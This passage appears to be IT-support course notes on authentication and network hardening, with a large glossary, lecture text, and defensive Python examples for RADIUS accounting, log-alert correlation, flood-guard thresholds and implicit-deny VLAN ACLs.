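    header = struct.pack(">BBH", ACCT_REQUEST, ident, 20 + len(body))
    auth = hashlib.md5(header + bytes(16) + body + secret).digest()
    return header + auth + body


def build_acct_response(ident, request_auth, secret):
    """Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attributes+Secret)."""
    header = struct.pack(">BBH", ACCT_RESPONSE, ident, 20)
    return header + hashlib.md5(header + request_auth + secret).digest()


def response_is_valid(resp, request_auth, secret):
    """NAS side: confirm the reply came from a server holding the shared secret."""
    expected = hashlib.md5(resp[:4] + request_auth + resp[20:] + secret).digest()
    return resp[0] == ACCT_RESPONSE and hmac.compare_digest(expected, resp[4:20])


class AccountingServer:
    def __init__(self, secret):
        self.secret = secret
        self.sessions = {}   # Acct-Session-Id -> running totals

    def handle(self, pkt):
        """Return an Accounting-Response, or None if the request is not authentic."""
        header, auth, body = pkt[:4], pkt[4:20], pkt[20:]
        code, ident, length = struct.unpack(">BBH", header)
        if code != ACCT_REQUEST or length != len(pkt):
            return None
        expected = hashlib.md5(header + bytes(16) + body + self.secret).digest()
        if not hmac.compare_digest(expected, auth):
            return None                  # wrong secret or tampered packet: discard
        attrs = decode_attrs(body)
        sid = attrs[ACCT_SESSION_ID].decode()
        status = struct.unpack(">I", attrs[ACCT_STATUS_TYPE])[0]
        rec = self.sessions.setdefault(sid, {"user": attrs[USER_NAME].decode(),
                                             "in": 0, "out": 0, "seconds": 0, "open": True})
        if status in (INTERIM_UPDATE, STOP):  # counters ride on updates and the stop
            rec["in"] = struct.unpack(">I", attrs[ACCT_INPUT_OCTETS])[0]
            rec["out"] = struct.unpack(">I", attrs[ACCT_OUTPUT_OCTETS])[0]
            rec["seconds"] = struct.unpack(">I", attrs[ACCT_SESSION_TIME])[0]
        if status == STOP:
            rec["open"] = False
        return build_acct_response(ident, auth, self.secret)

    def over_quota(self, sid, max_octets):
        """Quota check from accounting data alone: bytes moved, not what they carried."""
        rec = self.sessions[sid]
        return rec["in"] + rec["out"] > max_octets


def run_session(server, secret, user="alice", sid="sess-0001"):
    """Drive Start, one Interim-Update and Stop; return which replies verified."""
    steps = [(START, None), (INTERIM_UPDATE, (120_000, 30_000, 600)),
             (STOP, (900_000, 200_000, 3600))]          # constructed counters
    results = []
    for ident, (status, counters) in enumerate(steps):
        attrs = [(USER_NAME, user), (ACCT_SESSION_ID, sid), (ACCT_STATUS_TYPE, status)]
        if counters:
            n_in, n_out, seconds = counters
            attrs += [(ACCT_INPUT_OCTETS, n_in), (ACCT_OUTPUT_OCTETS, n_out),
                      (ACCT_SESSION_TIME, seconds)]
        req = build_acct_request(ident, secret, attrs)
        resp = server.handle(req)
        results.append(resp is not None and response_is_valid(resp, req[4:20], secret))
    return results
```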

Module 3 Glossary
New terms and their definitions: Course 5 Week 3
Access Control Entries: The individual access permissions per object that make up the ACL

Access Control List (ACL): It is a way of defining permissions or authorizations for objects

Accounting: Keeping records of what resources and services your users access or what they did when they
were using your systems

Auditing: It involves reviewing records to ensure that nothing is out of the ordinary

Authentication: A crucial application for cryptographic hash functions

Authentication server (AS): It includes the user ID of the authenticating user

Authorization: It pertains to describing what the user account has access to or doesn't have access to

Bind: It is how clients authenticate to the server

Biometric authentication: Authentication that uses Biometric data 

Certificate Revocation List (CRL): A means to distribute a list of certificates that are no longer valid

Client certificates: They operate very similarly to server certificates but are presented by clients and allow
servers to authenticate and verify clients

Counter-based tokens: They use a secret seed value along with the secret counter value that's
incremented every time a one-time password is generated on the device

Data information tree: A structure where objects will have one parent and can have one or more children
that belong to the parent object

Distinguished name (DN): A unique identifier for each entry in the directory 

Extensible authentication protocol (EAP over LAN, or EAPOL): A standard authentication protocol

Identification: The idea of describing an entity uniquely

Kerberos: A network authentication protocol that uses tickets to allow entities to prove their identity over
potentially insecure channels to provide mutual authentication

Lightweight Directory Access Protocol (LDAP): An open industry-standard protocol for accessing and
maintaining directory services; the most popular open-source alternative to the DAP

Multifactor authentication (MFA): A system where users are authenticated by presenting multiple pieces
of information or objects

Network time protocol (NTP): A network protocol used to synchronize the time between the
authenticator token and the authentication server

OAuth: An open standard that allows users to grant third-party websites and applications access to their
information without sharing account credentials

One-time password (OTP): A short-lived token, typically a number that's entered along with a username
and password

One-time password (OTP) tokens: Another very common method for handling multifactor

OpenID: An open standard that allows participating sites known as Relying Parties to allow authentication
of users utilizing a third party authentication service

Organizational units (OUs): Folders that let us group related objects into units like people or groups to
distinguish between individual user accounts and groups that accounts can belong to

Physical tokens: They take a few different forms, such as a USB device with a secret token on it, a
standalone device which generates a token, or even a simple key used with a traditional lock

Remote Authentication Dial-in User Service (RADIUS): A protocol that provides AAA services for users
on a network

Risk mitigation: Understanding the risks your systems face, take measures to reduce those risks, and
monitor them

Security keys: Small embedded cryptoprocessors, that have secure storage of asymmetric keys and
additional slots to run embedded code

Single Sign-on (SSO): An authentication concept that allows users to authenticate once to be granted
access to a lot of different services and applications

StartTLS: It permits a client to communicate using LDAP v3 over TLS

TACACS+: It is a device access AAA system that manages who has access to your network devices and
what they do on them

Ticket granting service (TGS): It decrypts the Ticket Granting Ticket using the Ticket Granting Service
secret key, which provides the Ticket Granting Service with the client Ticket Granting Service session key

Time-based token (TOTP): A One-Time-Password that's rotated periodically

U2F (Universal 2nd Factor): It's a standard developed jointly by Google, Yubico and NXP Semiconductors
that incorporates a challenge-response mechanism, along with public key cryptography to implement a
more secure and more convenient second-factor authentication solution

Unbind: It closes the connection to the LDAP server

XTACACS: It stands for Extended TACACS, which was a Cisco proprietary extension on top of TACACS

Terms and their definitions from previous weeks


A

Advanced Encryption Standard (AES): The first and only public cipher that's approved for use with top
secret information by the United States National Security Agency

Adware: Software that displays advertisements and collects data

Asymmetric encryption: Systems where different keys are used to encrypt and decrypt

Attack: An actual attempt at causing harm to a system


Authentication: A crucial application for cryptographic hash functions

Availability: Means that the information we have is readily accessible to those people that should have it

Backdoor: A way to get into a system if the other methods to get in a system aren't allowed, it's a secret
entryway for attackers

Baiting: An attack that happens through actual physical contact, enticing a victim to do something

Block ciphers: The cipher takes data in, places that into a bucket or block of data that's a fixed size, then
encodes that entire block as one unit

Botnet: A collection of one or more Bots

Bots: Machines compromised by malware that are utilized to perform tasks centrally controlled by an
attacker

Brute force attacks: A common password attack which consists of just continuously trying different
combinations of characters and letters until one gets access

CA (Certificate authority): It's the entity that's responsible for storing, issuing, and signing certificates. It's
a crucial component of the PKI system

Caesar cipher: A substitution alphabet, where you replace characters in the alphabet with others usually
by shifting or rotating the alphabet, a set of numbers or characters

CBC-MAC (Cipher block chaining message authentication codes): A mechanism for building MACs using
block ciphers

Central repository: It is needed to securely store and index keys and a certificate management system of
some sort makes managing access to storage certificates and issuance of certificates easier

Certificate fingerprints: These are just hash digests of the whole certificate, and aren't actually fields in
the certificate itself, but are computed by clients when validating or inspecting certificates

Certificate Revocation List (CRL): A means to distribute a list of certificates that are no longer valid

Certificate Signature Algorithm: This field indicates what public key algorithm is used for the public key
and what hashing algorithm is used to sign the certificate

Certificate-based authentication: It is the most secure option, but it requires more support and
management overhead since every client must have a certificate

Certificate Signature Value: The digital signature data itself


CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model for designing
information security policies

CMACs (Cipher-based Message Authentication Codes): The process is similar to HMAC, but instead of
using a hashing function to produce a digest, a symmetric cipher with a shared keys used to encrypt the
message and the resulting output is used as the MAC

Code signing certificates: It is used for signing executable programs and allows users of these signed
applications to verify the signatures and ensure that the application was not tampered with

Confidentiality: Keeping things hidden

Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious code and
target the user of the service

Cryptanalysis: Looking for hidden messages or trying to decipher coded message

Cryptography: The overarching discipline that covers the practice of coding and hiding messages from
third parties

Cryptology: The study of cryptography

Cryptosystem: A collection of algorithms for key generation and encryption and decryption operations
that comprise a cryptographic service 

Cryptographic hashing: It is distinctly different from encryption because cryptographic hash functions
should be one directional

Data binding and sealing: It involves using the secret key to derive a unique key that's then used for
encryption of data

Decryption: The reverse process from encryption; taking the garbled output and transforming it back into
the readable plain text

Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for legitimate users by
overwhelming the network or server

DES (Data Encryption Standard): One of the earliest encryption standards 

Deterministic: It means that the same input value should always return the same hash value

DH (Diffie-Hellman): A popular key exchange algorithm, named for its co-inventors

Dictionary attack: A type of password attack that tries out words that are commonly used in passwords,
like password, monkey, football

Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems


DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS record that will
point you to a compromised DNS server

DSA (Digital Signature Algorithm): It is another example of an asymmetric encryption system, though it's
used for signing and verifying data

ECDH & ECDSA: Elliptic curve variants of Diffie-Hellman and DSA, respectively

Elliptic curve cryptography (ECC): A public key encryption system that uses the algebraic structure of
elliptic curves over finite fields to generate secure keys

Encapsulating security payload: It's a part of the IPsec suite of protocols, which encapsulates IP packets,
providing confidentiality, integrity, and authentication of the packets

Encryption: The act of taking a message (plaintext), and applying an operation to it (cipher), so that you
receive a garbled, unreadable message as the output (ciphertext)

Encryption algorithm: The underlying logic or process that's used to convert the plaintext into ciphertext

End-entity (leaf certificate): A certificate that has no authority as a CA

Entropy pool: A source of random data to help seed random number generators

Evil twin: The premise of an evil twin attack is for you to connect to a network that is identical to yours but
that is controlled by an attacker. Once connected to it, they will be able to monitor your traffic

Exploit: Software that is used to take advantage of a security bug or vulnerability

FIPS (Federal Information Processing Standard): The DES that was adopted as a federal standard for
encrypting and securing government data

Forward secrecy: This is a property of a cryptographic system so that even in the event that the private key
is compromised, the session keys are still safe

Frequency analysis: The practice of studying the frequency with which letters appear in ciphertext

Full disk encryption (FDE): It is the practice of encrypting the entire drive in the system

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: A way to refer to SYN floods

Hash collisions: Two different inputs mapping to the same output


Hashing (Hash function): A type of function or operation that takes in an arbitrary data input and maps it
to an output of a fixed size, called a hash or a digest

HMAC (Keyed-Hash Message Authentication Codes): It uses a cryptographic hash function along with a
secret key to generate a MAC

HTTPS: Hypertext Transfer Protocol Secure is a secure version of HTTP that ensures the communication
your web browser has with the website is secured through encryption

Injection attacks: A common security exploit that can occur in software development and runs rampant on
the web, where an attacker injects malicious code

Integrity: Means keeping our data accurate and untampered with

Intermediary (subordinate) CA: It means that the entity that this certificate was issued to can now sign
other certificates

IPsec (Internet Protocol security): A VPN protocol that was designed in conjunction with IPv6

Issuer Name: This field contains information about the authority that signed the certificate

Kerckhoff's principle: A principle that states that a cryptosystem, or a collection of algorithms for key
generation and encryption and decryption operations that comprise a cryptographic service should remain
secure, even if everything about the system is known except for the key

Key: A crucial component of a cipher, which introduces something unique into your cipher

Key length: It defines the maximum potential strength of the system

Key signing parties: Organized by people who are interested in establishing a web of trust, and
participants perform the same verification and signing

Key size: It is the total number of bits or data that comprises the encryption key

Keylogger: A common type of spyware that's used to record every keystroke you make

Logic bomb: A type of Malware that's intentionally installed

L2TP (Layer 2 Tunneling Protocol): It is typically used to support VPNs

MACs (Message Authentication Codes): A bit of information that allows authentication of a received
message, ensuring that the message came from the alleged sender and not a third party masquerading as
them

Malware: A type of malicious software that can be used to obtain your sensitive information or delete or
modify files

Meddler in the middle (formerly known as Man in the Middle): An attack that places the attacker in the
middle of two hosts that think they're communicating directly with each other

MD5: A popular and widely used hash function designed in the early 1990s as a cryptographic hashing
function

MIC (Message Integrity Check): It is essentially a hash digest of the message in question

NIST: National Institute of Standards and Technology 

Password attacks: Utilize software like password crackers that try and guess your password

Password salt: Additional randomized data that's added into the hashing function to generate the hash
that's unique to the password and salt combination

PGP (Pretty Good Privacy) encryption: An encryption application that allows authentication of data
along with privacy from third parties relying upon asymmetric encryption to achieve this

Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as something
legitimate

Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this, then it's prone
to being overwhelmed and taken down

PKI system: A system that defines the creation, storage and distribution of digital certificates

Pseudo-random: Something that isn't truly random

Public key authentication: A key pair is generated by the user who wants to authenticate

Public key signatures: Digital signature generated by composing the message and combining it with the
private key

RA (Registration Authority): It is responsible for verifying the identities of any entities requesting
certificates to be signed and stored with the CA

Rainbow table attacks: To trade computational power for disk space by pre-computing the hashes and
storing them in a table

Rainbow tables: A pre-computed table of all possible password values and their corresponding hashes

Random numbers: A very important concept in encryption because it avoids some kind of pattern that an
adversary can discover through close observation and analysis of encrypted messages over time

Ransomware: A type of attack that holds your data or system hostage until you pay some sort of ransom

RC4 (Rivest Cipher 4): A symmetric stream cipher that gained widespread adoption because of its
simplicity and speed

Remote attestation: The idea of a system authenticating its software and hardware configuration to a
remote system

Risk: The possibility of suffering a loss in the event of an attack on the system

Rogue Access Point (AP) Attack: An access point that is installed on the network without the network
administrator's knowledge

Root certificate authority: They are self signed because they are the start of the chain of trust, so there's
no higher authority that can sign on their behalf

Rootkit: A collection of software or tools that an admin would use

RSA: One of the first practical asymmetric cryptography systems to be developed, named for the initials of
the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman

Screen lock: A security feature that helps prevent unwanted access by creating an action you have to do to
gain entry

Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and authentication of
data being passed

Secure element: It's a tamper resistant chip often embedded in the microprocessor or integrated into the
mainboard of a mobile device

Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a network service
over unsecured networks

Security through obscurity: The principle that if no one knows what algorithm is being used or general
security practices, then one is safe from attackers

Self-signed certificate: This certificate has been signed by the same entity that issued the certificate

Serial number: A unique identifier for their certificate assigned by the CA which allows the CA to manage
and identify individual certificates

Session hijacking (cookie hijacking): A common meddler in the middle attack

Session key: The shared symmetric encryption key using TLS sessions to encrypt data being sent back and
forth

SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and published in 1995

Shannon's maxim: It states that the system should remain secure, even if your adversary knows exactly
what kind of encryption systems you're employing, as long as your keys remain secure

Social engineering: An attack method that relies heavily on interactions with humans instead of
computers

Spear phishing: Phishing that targets individual or group - the fake emails may contain some personal
information like your name, or the names of friends or family

Spoofing: When a source is masquerading around as something else

Spyware: The type of malware that's meant to spy on you

SQL Injection Attack: An attack that targets the entire website if the website is using a SQL database

SSL 3.0: The latest revision of SSL that was deprecated in 2015

SSL/TLS Client Certificate: Certificates that are bound to clients and are used to authenticate the client
to the server, allowing access control to a SSL/TLS service

SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the initial secure
setup of an SSL, TLS connection

Steganography: The practice of hiding information from observers, but not encoding it

Stream ciphers: It takes a stream of input and encrypts the stream one character or one digit at a time,
outputting one encrypted character or digit at a time

Subject: This field contains identifying information about the entity the certificate was issued to

Subject Public Key Info: These two subfields define the algorithm of the public key along with the public
key itself

Substitution cipher: An encryption mechanism that replaces parts of your plaintext with ciphertext

Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and decrypt messages

SYN flood: The server is bombarded with SYN packets

Tailgating: Gaining access into a restricted area or building by following a real employee in

Threat: The possibility of danger that could exploit a vulnerability

TLS 1.2: The current recommended revision of SSL

TLS 1.2 with AES GCM: A specific mode of operation for the AES block cipher that essentially turns it into
a stream cipher

TLS Handshake: A mechanism to initially establish a channel for an application to communicate with a
service 

TPM (Trusted Platform Module): This is a hardware device that's typically integrated into the hardware
of a computer, that's a dedicated crypto processor

Transport mode: One of the two modes of operations supported by IPsec. When used, only the payload of
the IP packet is encrypted, leaving the IP headers untouched

Trojan: Malware that disguises itself as one thing but does something else

Trusted execution environment (TEE): It provides a full-blown isolated execution environment that runs
alongside the main OS

Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one network to
another

Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire IP packet,
header, payload, and all, is encrypted and encapsulated inside a new IP packet with new headers

Username and password authentication: Can be used in conjunction with certificate authentication,
providing additional layers of security

Validity: This field contains two subfields, Not Before and Not After, which define the dates when the
certificate is valid for

Version: What version of the X.509 standard certificate adheres to

Viruses: The best known type of malware

VPN (Virtual Private Network): A secure method of connecting a device to a private network over the
internet

Vulnerability: A flaw in the system that could be exploited to compromise the system

Web of trust: It is where individuals instead of certificate authorities sign other individuals' public keys

Worms: They are similar to viruses except that instead of having to attach themselves onto something to
spread, worms can live on their own and spread through channels like the network

X.509 standard: It is what defines the format of digital certificates, as well as a certificate revocation list or
CRL

Z

0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer or vendor, but
is known to

Congrats on getting this far. You're over halfway through the course and so close to completing the program. In this section, we'll cover ways for you to harden your networks. Network hardening is the process of securing a network by reducing its potential vulnerabilities through configuration changes and taking specific steps. In the next few lessons, we'll do a deep dive on the best practices that an IT support specialist should know for implementing network hardening. We'll also discuss network security protection along with network monitoring and analysis.

There's a general security principle that can be applied to most areas of security: the concept of disabling unnecessary extra services or restricting access to them. Since any service that's enabled and accessible can be attacked, this principle should be applied to network security too. Networks would be much safer if you disable access to network services that aren't needed and enforce access restrictions.

Implicit deny is a network security concept where anything not explicitly permitted or allowed should be denied. This is different from blocking all traffic, since an implicit deny configuration will still let traffic pass that you've defined as allowed. You can do this through ACL configurations. This can usually be configured on a firewall, which makes it easier to build secure firewall rules. Instead of requiring you to specifically block all traffic you don't want, you can just create rules for the traffic that you need to go through. You can think of this as whitelisting as opposed to blacklisting. While this is slightly less convenient, it's a much more secure configuration. Before a new service will work, a new rule must be defined for it, reducing convenience a bit.
Another very important component of network security 
is monitoring and analyzing traffic on your network. 
You learned about monitoring in 
a previous course of this program. 
But we'll refer to monitoring in 
the context of network analysis here. 
There are a couple of reasons why 
monitoring your network is so important. 
The first is that it lets you establish 
a baseline of what 
your typical network traffic looks like. 
This is key because in order to know what 
unusual or potential attack traffic looks like, 
you need to know what normal traffic looks like. 
You can do this through 
network traffic monitoring and logs analysis. 
We'll dive deeper into 
what network traffic monitoring is a bit later. 
But let's quickly summarize how 
logs can be helpful in this context. 
Analyzing logs is the practice of collecting logs 
from different network and 
sometimes client devices on your network, 
then performing an automated analysis on them. 
This will highlight potential intrusions, 
signs of malware infections, 
or a typical behavior. 
You'd want to analyze things like firewall logs, 
authentication server logs, and application logs. 
As an IT support specialist, 
you should pay close attention to 
any external facing devices or services. 
They're subject to a lot 
more potentially malicious traffic, 
which increases the risk of compromise. 
Analysis of logs would involve looking 
for a specific log messages of interests, 
like with firewall logs. 
Attempted connections to an internal service from 
an untrusted source address may be worth investigating. 
Connections from the internal network 
to known address ranges of 
botnet command and control servers 
could mean there's a compromised machine on the network. 
As you learned in earlier courses of this program, 
log and analysis systems are a best practice 
for IT support specialist to utilize and implement. 
This is true too, for network hardening. 
Logs analysis systems are configured using 
user-defined rules to match 
interesting or a typical log entries. 
These can then be surfaced through an alerting system 
to let security engineers investigate the alert. 
Part of this alerting process would also involve 
categorizing the alert based on the rule matched. 
You'd also need to assign a priority to facilitate 
this investigation and to 
permit better searching or filtering. 
Alerts can take the form of sending an email or 
an SMS with information 
and a link to the event that was detected. 
You could even wake someone up in the middle of 
the night if the event was severe enough. 
Normalizing log data is an important step since logs 
from different devices and systems 
may not be formatted in a common way. 
You might need to convert log components 
into a common format to make 
analysis easier for analysts 
and rule-based detection systems. 
This also makes correlation analysis easier. 
Correlation analysis is the process of taking log data 
from different systems and 
matching events across the systems. 
If we see a suspicious connection coming from 
a suspect source address and the firewall logs to 
our authentication server we might want to correlate that 
logged connection with the log data 
of the authentication server. 
That would show us any authentication attempts 
made by the suspicious client. 
This type of logs analysis is 
also super important in investigating 
and recreating the events that 
happened once a compromise is detected. 
This is usually called a post fail analysis, 
since it's investigating how 
a compromise happened after the breach is detected. 
Detailed logging and analysis of logs would allow for 
detailed reconstruction of the events 
that led to the compromise. 
Hopefully, this would let the security team make 
appropriate changes to security systems 
to prevent further attacks. 
It could also help determine 
the extent and severity of the compromise. 
Detailed logging would also be able to show if 
further systems were compromised 
after the initial breach. 
It would also tell us whether or not any data 
was stolen and if it was what that data was. 
One popular and powerful logs analysis system is splunk, 
a very flexible and extensible log aggregation 
and search system. 
Splunk can grab logs data from 
a wide variety of systems 
and in large amounts of formats. 
It can also be configured to generate alerts and allows 
for powerful visualization of activity based on log data. 
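The normalization, rule matching, prioritization and correlation steps described above, carried out in a small Python script. This is an added example written for these notes, not code from the course or from Splunk: the two log formats, the internal address range and the "known C2" range are all constructed for the illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample logs in two different formats (a firewall and an SSH authentication server).
FIREWALL_LOG = """\
2024-03-01T09:14:02Z fw01 ACCEPT src=203.0.113.45 dst=10.0.0.12 dport=22 proto=tcp
2024-03-01T09:14:05Z fw01 ACCEPT src=10.0.0.77 dst=198.51.100.9 dport=443 proto=tcp
2024-03-01T09:14:09Z fw01 DROP src=203.0.113.45 dst=10.0.0.12 dport=3389 proto=tcp
2024-03-01T09:15:00Z fw01 ACCEPT src=10.0.0.23 dst=10.0.0.12 dport=22 proto=tcp
"""
AUTH_LOG = """\
Mar  1 09:14:03 authsrv sshd[4121]: Failed password for root from 203.0.113.45 port 50122 ssh2
Mar  1 09:14:04 authsrv sshd[4121]: Failed password for admin from 203.0.113.45 port 50122 ssh2
Mar  1 09:15:01 authsrv sshd[4130]: Accepted publickey for alice from 10.0.0.23 port 51000 ssh2
"""

INTERNAL = ipaddress.ip_network("10.0.0.0/8")                 # assumed internal range
C2_RANGES = [ipaddress.ip_network("198.51.100.0/24")]          # constructed "known C2" range

FW_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<action>ACCEPT|DROP) "
                   r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
AUTH_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
                     r"(?P<result>Failed|Accepted) \w+ for (?P<user>\S+) from (?P<src>\S+)")


def normalize(fw_text, auth_text):
    """Convert both formats into one common event dictionary."""
    events = []
    for line in fw_text.splitlines():
        m = FW_RE.match(line)
        if m:
            events.append({"source": "firewall", "ts": m["ts"], "action": m["action"],
                           "src": ipaddress.ip_address(m["src"]),
                           "dst": ipaddress.ip_address(m["dst"]),
                           "dport": int(m["dport"]), "user": None})
    for line in auth_text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            events.append({"source": "auth", "ts": m["ts"], "action": m["result"].upper(),
                           "src": ipaddress.ip_address(m["src"]), "dst": None,
                           "dport": None, "user": m["user"]})
    return events


# User-defined rules: (name, priority, predicate over a normalized event).
def external_to_internal(e):
    return (e["source"] == "firewall" and e["action"] == "ACCEPT"
            and e["src"] not in INTERNAL and e["dst"] in INTERNAL)


def to_known_c2(e):
    return e["source"] == "firewall" and any(e["dst"] in net for net in C2_RANGES)


RULES = [
    ("external-to-internal-accept", "medium", external_to_internal),
    ("connection-to-known-c2", "high", to_known_c2),
]


def match_rules(events):
    """Categorize each matching event by rule and attach the rule's priority."""
    return [{"rule": name, "priority": prio, "event": e}
            for e in events for name, prio, pred in RULES if pred(e)]


def correlate(alerts, events):
    """Attach authentication-server events from the same source address to each alert."""
    by_src = defaultdict(list)
    for e in events:
        if e["source"] == "auth":
            by_src[e["src"]].append(e)
    for a in alerts:
        a["auth_events"] = by_src.get(a["event"]["src"], [])
    return alerts


def analyze(fw_text=FIREWALL_LOG, auth_text=AUTH_LOG):
    events = normalize(fw_text, auth_text)
    return correlate(match_rules(events), events)
```

Running `analyze()` on the constructed logs produces two alerts: a medium-priority one for the external address that reached the internal SSH service, now carrying the two failed logins that address produced on the authentication server, and a high-priority one for the internal host that connected into the constructed C2 range.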
Flood guards provide protection against DoS, or Denial of Service, attacks. Think back to the CIA triad we covered earlier. Availability is an important tenet of security and is exactly what flood guard protections are designed to help ensure. This works by identifying common flood attack types like SYN floods or UDP floods. It then triggers alerts once a configurable threshold of traffic is reached. There's another threshold called the activation threshold. When this one is reached, it triggers a pre-configured action. This will typically block the identified attack traffic for a specific amount of time. This is usually a feature on enterprise-grade routers or firewalls, though it's a general security concept. A common open-source flood guard protection tool is fail2ban. It watches for signs of an attack on a system and blocks further attempts from a suspected attack address. fail2ban is a popular tool for smaller-scale organizations. If you're the sole IT support specialist in your company or have a small fleet of machines, this can be a helpful tool to use. This flood guard protection can also be described as a form of intrusion prevention system.
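The two-threshold behaviour described above (an alert threshold, then an activation threshold that blocks the source for a fixed time), modelled in Python. This is an added example for these notes, not fail2ban's code or any vendor's; the thresholds, time window and the sample event stream are all constructed.

```python
from collections import defaultdict, deque


class FloodGuard:
    """Per-source counters over a sliding window with an alert threshold,
    an activation threshold and a timed block, as the lecture describes."""

    def __init__(self, alert_threshold, activation_threshold, window_seconds, block_seconds):
        self.alert_threshold = alert_threshold
        self.activation_threshold = activation_threshold
        self.window = window_seconds
        self.block_seconds = block_seconds
        self.events = defaultdict(deque)   # src -> timestamps inside the window
        self.blocked_until = {}            # src -> time at which its block expires
        self.alerts = []                   # (time, src, kind) for the alerting system

    def observe(self, src, now):
        """Record one suspicious event (a SYN, a failed login, ...) from src.
        Returns 'blocked', 'alert' or 'ok'."""
        until = self.blocked_until.get(src)
        if until is not None:
            if now < until:
                return "blocked"            # still inside the block period
            del self.blocked_until[src]     # block expired: start counting afresh
            self.events[src].clear()
        q = self.events[src]
        q.append(now)
        while q and now - q[0] > self.window:   # drop events older than the window
            q.popleft()
        count = len(q)
        if count >= self.activation_threshold:
            self.blocked_until[src] = now + self.block_seconds
            self.alerts.append((now, src, "blocked"))
            return "blocked"
        if count == self.alert_threshold:
            self.alerts.append((now, src, "alert"))
            return "alert"
        return "ok"


def replay(guard, attempts):
    """Feed (time, src) pairs through the guard and return each verdict."""
    return [guard.observe(src, t) for t, src in attempts]


# Constructed stream: 203.0.113.5 fires 8 events in 8 seconds, an internal host sends one,
# then 203.0.113.5 returns after its block has expired.
SAMPLE = [(t, "203.0.113.5") for t in range(8)] + [(3, "10.0.0.4"), (200, "203.0.113.5")]
```

With an alert threshold of 3, an activation threshold of 5, a 60-second window and a 120-second block, the third event raises an alert, the fifth triggers the block, the following three are dropped without counting, the unrelated internal host is unaffected, and the source is admitted again once the block has lapsed.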
Network separation, or network segmentation, is a good security principle for an IT support specialist to implement. It permits more flexible management of the network and provides some security benefits. This is the concept of using VLANs to create virtual networks for different device classes or types. Think of it as creating dedicated virtual networks for your employees to use, but also having separate networks for your printers to connect to. The idea here is that the printers won't need access to the same network resources that employees do. It probably doesn't make sense to have the printers on the employee network. You might be wondering how employees are supposed to print if the printers are on a different network. It's actually one of the benefits of network separation, since we can control and monitor the flow of traffic between networks more easily. To give employees access to printers, we'd configure routing between the two networks on our routers. We'd also implement network ACLs that permit the appropriate traffic.
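The implicit deny principle from earlier in this lesson and the employee/printer VLAN ACL just described, combined in one Python model. This is an added example for these notes, not a real router's ACL syntax; the two VLAN ranges, the printing ports and the sample flows are constructed. The point it shows is that the ACL lists only the flows we need, and everything that matches no rule falls through to the implicit deny, so nothing has to be enumerated for blocking.

```python
from __future__ import annotations
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Rule:
    name: str
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    proto: str              # "tcp", "udp" or "any"
    dport: Optional[int]    # None means any destination port


# Constructed VLAN addressing for this example; your network will use different ranges.
EMPLOYEE_VLAN = ipaddress.ip_network("10.10.0.0/24")
PRINTER_VLAN = ipaddress.ip_network("10.20.0.0/24")

# Only the flows employees need to print (IPP on 631 and raw printing on 9100).
PRINTER_ACL = [
    Rule("employees-to-printers-ipp", EMPLOYEE_VLAN, PRINTER_VLAN, "tcp", 631),
    Rule("employees-to-printers-raw", EMPLOYEE_VLAN, PRINTER_VLAN, "tcp", 9100),
]


def evaluate(acl, src: str, dst: str, proto: str, dport: int):
    """First matching permit wins; no match means deny (the implicit deny)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in acl:
        if (s in rule.src and d in rule.dst
                and rule.proto in ("any", proto)
                and rule.dport in (None, dport)):
            return ("permit", rule.name)
    return ("deny", "implicit-deny")


def audit(acl, flows):
    """Evaluate (src, dst, proto, dport) flows, e.g. to check a proposed ACL
    against the traffic you expect before deploying it on the router."""
    return [(flow, evaluate(acl, *flow)) for flow in flows]


SAMPLE_FLOWS = [
    ("10.10.0.15", "10.20.0.7", "tcp", 9100),   # employee printing: permitted
    ("10.20.0.7", "10.10.0.15", "tcp", 445),    # printer reaching into the employee VLAN: denied
    ("10.10.0.15", "10.20.0.7", "tcp", 22),     # SSH to a printer: not needed, denied
    ("192.0.2.9", "10.20.0.7", "tcp", 631),     # outside address: denied
]
```

Only the first sample flow is permitted; the other three are denied without any rule mentioning them, which is exactly what distinguishes implicit deny from a blacklist.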

Supplemental Reading for Network Hardening Best Practices
For more information on this Video Lecture check out the following links:

Cisco IOS firewall rules

Juniper firewall rules

Iptables firewall rules

UFW firewall rules

Configuring Mac OS X firewall

Microsoft firewall rules

Supplemental Reading on IEEE 802.1X

IEEE 802.1X
When clients are trying to communicate on a local network, the devices must have a standard method of
communication and authentication. The Institute of Electrical and Electronics Engineers (IEEE) created a
standard called IEEE 802.1X. This standard specifies a common architecture, functional elements, and
protocols that support authentication between the clients of ports attached to the same Local Area
Network (LAN). This reading will cover what 802.1X is, basic components of authentication and how it
works, and different kinds of authentication available for use under the standard.

IEEE 802.1X Protocol


IEEE 802 networks are deployed in locations that provide access to critical data, support mission critical
applications, or charge for service. Port-based network access control regulates access to the network,
guarding against attacks by unauthorized parties, network disruption, and data loss.

Authentication
The three main components in the authentication process are:

- Supplicant is the client making the request to access the LAN or wireless access point.
- Authenticator takes the packet from the supplicant and sends it to the authentication server until
the session is authenticated. Any other information sent before authentication occurs is dropped.
- Authentication server provides a database of information required for authentication, and
informs the authenticator to deny or permit access to the supplicant.

